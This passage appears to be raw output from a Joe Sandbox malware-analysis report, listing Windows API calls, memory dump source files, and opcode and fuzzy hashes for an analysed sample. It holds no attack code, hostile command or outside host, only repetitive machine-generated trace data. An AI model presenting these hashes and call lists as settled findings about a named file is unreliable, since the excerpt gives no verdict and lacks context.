                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1175261203-0
                                                            • Opcode ID: 64b27637e3c3d55f0c90828438cbdc25aec5cc40504acbc305dd45996f6d2af5
                                                            • Instruction ID: c1ab7e66b73ad9cadf1f09ea0f6f2b952297bbaa4b5905d8e3d8af09d1498531
                                                            • Opcode Fuzzy Hash: 64b27637e3c3d55f0c90828438cbdc25aec5cc40504acbc305dd45996f6d2af5
                                                            • Instruction Fuzzy Hash: 66E048764011986BDB11A795DC05FDA77ECEF0D3D1F0500A67645D2104D7B4DA84CBB0
                                                            APIs
                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BEA3DA
                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00BEA3E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: BitmapCreateFromGdipStream
                                                            • String ID:
                                                            • API String ID: 1918208029-0
                                                            APIs
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BF2BAA
                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00BF2BB5
                                                            Similarity
                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1660781231-0
                                                            APIs
                                                            Similarity
                                                            • API ID: ItemShowWindow
                                                            • String ID:
                                                            • API String ID: 3351165006-0
                                                            APIs
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD8289
                                                              • Part of subcall function 00BD13DC: __EH_prolog.LIBCMT ref: 00BD13E1
                                                              • Part of subcall function 00BDA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BDA598
                                                            Similarity
                                                            • API ID: H_prolog$CloseFind
                                                            • String ID:
                                                            • API String ID: 2506663941-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD13E1
                                                              • Part of subcall function 00BD5E37: __EH_prolog.LIBCMT ref: 00BD5E3C
                                                              • Part of subcall function 00BDCE40: __EH_prolog.LIBCMT ref: 00BDCE45
                                                              • Part of subcall function 00BDB505: __EH_prolog.LIBCMT ref: 00BDB50A
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD13E1
                                                              • Part of subcall function 00BD5E37: __EH_prolog.LIBCMT ref: 00BD5E3C
                                                              • Part of subcall function 00BDCE40: __EH_prolog.LIBCMT ref: 00BDCE45
                                                              • Part of subcall function 00BDB505: __EH_prolog.LIBCMT ref: 00BDB50A
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BEB098
                                                              • Part of subcall function 00BD13DC: __EH_prolog.LIBCMT ref: 00BD13E1
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00BFACF8
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            APIs
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                              • Part of subcall function 00BFB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BF9813,00000001,00000364,?,00BF3F73,00000050,?,00C11030,00000200), ref: 00BFB177
                                                            • _free.LIBCMT ref: 00BFC4E5
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BF9813,00000001,00000364,?,00BF3F73,00000050,?,00C11030,00000200), ref: 00BFB177
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00BF3C3F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BFCA2C,00000000,?,00BF6CBE,?,00000008,?,00BF91E0,?,?,?), ref: 00BF8E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD5AC2
                                                              • Part of subcall function 00BDB505: __EH_prolog.LIBCMT ref: 00BDB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                              • Part of subcall function 00BDA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6C4
                                                              • Part of subcall function 00BDA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6F2
                                                              • Part of subcall function 00BDA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6FE
                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BDA598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                            • String ID:
                                                            • API String ID: 1464966427-0
                                                            APIs
                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 00BE0E3D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ExecutionStateThread
                                                            • String ID:
                                                            • API String ID: 2211380416-0
                                                            APIs
                                                            • GdipAlloc.GDIPLUS(00000010), ref: 00BEA62C
                                                              • Part of subcall function 00BEA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BEA3DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                            • String ID:
                                                            • API String ID: 1915507550-0
                                                            APIs
                                                            • DloadProtectSection.DELAYIMP ref: 00BEE5E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: DloadProtectSection
                                                            • String ID:
                                                            • API String ID: 2203082970-0
                                                            APIs
                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00BE1B3E), ref: 00BEDD92
                                                              • Part of subcall function 00BEB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BEB579
                                                              • Part of subcall function 00BEB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEB58A
                                                              • Part of subcall function 00BEB568: IsDialogMessageW.USER32(0001043E,?), ref: 00BEB59E
                                                              • Part of subcall function 00BEB568: TranslateMessage.USER32(?), ref: 00BEB5AC
                                                              • Part of subcall function 00BEB568: DispatchMessageW.USER32(?), ref: 00BEB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                            • String ID:
                                                            • API String ID: 897784432-0
                                                            APIs
                                                            • GetFileType.KERNELBASE(000000FF,00BD97BE), ref: 00BD98C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: FileType
                                                            • String ID:
                                                            • API String ID: 3081899298-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 55d00e1f6e0673295ed63adc86289accd021f8601ee62c248960203c7d8f9657
                                                            • Instruction ID: c75aa2a41ef17f54f1f8566e0eb1c972d043e4a4b4b167c8cf9b864cfd9e73c3
                                                            • Opcode Fuzzy Hash: 55d00e1f6e0673295ed63adc86289accd021f8601ee62c248960203c7d8f9657
                                                            • Instruction Fuzzy Hash: C8B012D936C1C0BC310812471C92C3B014CC0C1B11B30857EFC21D04C0FA40EC441432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 94a7cf4731b56875f46221f9362c05b0a5f7f2e663c80583cab2fbf8e01c8d9f
                                                            • Instruction ID: f4c527ab77f7c40c0693ac6ccf438a34cf0293348bc0e3827fdd1aa94144e3b9
                                                            • Opcode Fuzzy Hash: 94a7cf4731b56875f46221f9362c05b0a5f7f2e663c80583cab2fbf8e01c8d9f
                                                            • Instruction Fuzzy Hash: 3CB012E526C0C0AC310852071D42C3B01DCC0C0B11F30417EF825C00C0FF40ED852432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4e03fdb764926e0db6bb9ad22bd0fdb97e480c47e3ebea57fb33977f22ca2e8e
                                                            • Instruction ID: 3836c55600dc9519e0cb3dd8333774ee50161e9c2eb6352bd9a672d46dcb79f6
                                                            • Opcode Fuzzy Hash: 4e03fdb764926e0db6bb9ad22bd0fdb97e480c47e3ebea57fb33977f22ca2e8e
                                                            • Instruction Fuzzy Hash: 54B012E526C0C0AC320852071C42C3B019CC0C0F11B30417EF826C00C0FA40ED441432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 99bb25c7193f92b099931bb7b834f6ff52f20afe45509f9668eaff9666b98380
                                                            • Instruction ID: b69459e66f4a6257677e50a19651357fa5711a27435bb64a11a7ba3cca87c230
                                                            • Opcode Fuzzy Hash: 99bb25c7193f92b099931bb7b834f6ff52f20afe45509f9668eaff9666b98380
                                                            • Instruction Fuzzy Hash: 42B012E526C0C0AC320852071D42C3B019CC0C0F11B30417EF826C00C0FE40EE852432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 073d3a07ded9107b3225c96e1fb99101ac4e9db242fd7d0f5a503204439ebe76
                                                            • Instruction ID: 1bfe3636df12bd5a030ddb257e64c9ec3822c6ce2fcdd769b2a4f358479f361f
                                                            • Opcode Fuzzy Hash: 073d3a07ded9107b3225c96e1fb99101ac4e9db242fd7d0f5a503204439ebe76
                                                            • Instruction Fuzzy Hash: D5B012E526C1C0BC324852071C42C3B019CC0C0F12B30427EF826C00C0FA80ED841432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ba6297c648f5472b95cb53d575fee55d3b7474e6349f20b1257160a67745ccbe
                                                            • Instruction ID: 4e6c73f8a26b71226ae1021d8c8b55c1a8d7200428b6413a5cef3168a19273bf
                                                            • Opcode Fuzzy Hash: ba6297c648f5472b95cb53d575fee55d3b7474e6349f20b1257160a67745ccbe
                                                            • Instruction Fuzzy Hash: 1AB012E526C0C0BC320852071C42C3B019CC0C1F11B30817EFC26C00C0FA40ED441432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9cc559326b7b508d09401e1e925d8d8c99a79502d582985bd5ff6dd57fc3b303
                                                            • Instruction ID: 0619d3b5fd67e00df623a803faa4da0873bdcbd7d78dbf8518966ec7df31a124
                                                            • Opcode Fuzzy Hash: 9cc559326b7b508d09401e1e925d8d8c99a79502d582985bd5ff6dd57fc3b303
                                                            • Instruction Fuzzy Hash: CAB012D526C0C0AC310853071D42C3B018CC0C0B11B30817EF825C01C0FE50ED8D2432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 523dd2c820943d3f4c7511d96b2a796c15a6b9de5b853e6eef4e823cba29c223
                                                            • Instruction ID: c55ab0efb1b4ea6ad3513010fbe87c4202d598e2ed4f3b2b2d400832b548684e
                                                            • Opcode Fuzzy Hash: 523dd2c820943d3f4c7511d96b2a796c15a6b9de5b853e6eef4e823cba29c223
                                                            • Instruction Fuzzy Hash: C3B012D536C1C0BC314853071C42C3B018CC0C0B12B30827EF825C01C0FA80EC881432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 244a1ff3813eacda0a341b18dbd7c65bad4b078a4ae1a6a435302b3c88bf5bea
                                                            • Instruction ID: bef668d9fac5f0f99bb3e377798417fd94ce8ab81bf118cd33f60446a313e5d1
                                                            • Opcode Fuzzy Hash: 244a1ff3813eacda0a341b18dbd7c65bad4b078a4ae1a6a435302b3c88bf5bea
                                                            • Instruction Fuzzy Hash: 33B012D526C0C0AC310852171C42C3B01DCC0C1B11B30817EFC25C00C0FB40EC441432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 53f6450dd967ccb98dce4ea9f0086820fc839fc8b3c6d17011faa631df4782f3
                                                            • Instruction ID: 14badadb2fd3d15554b6e9fc76d37f515f155481512cace81311f8d9a3e23a49
                                                            • Opcode Fuzzy Hash: 53f6450dd967ccb98dce4ea9f0086820fc839fc8b3c6d17011faa631df4782f3
                                                            • Instruction Fuzzy Hash: 10B012D527D0C0AC310852071C42C3B01CDC4C0B21F30417EF826C40C0FA40EC441432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
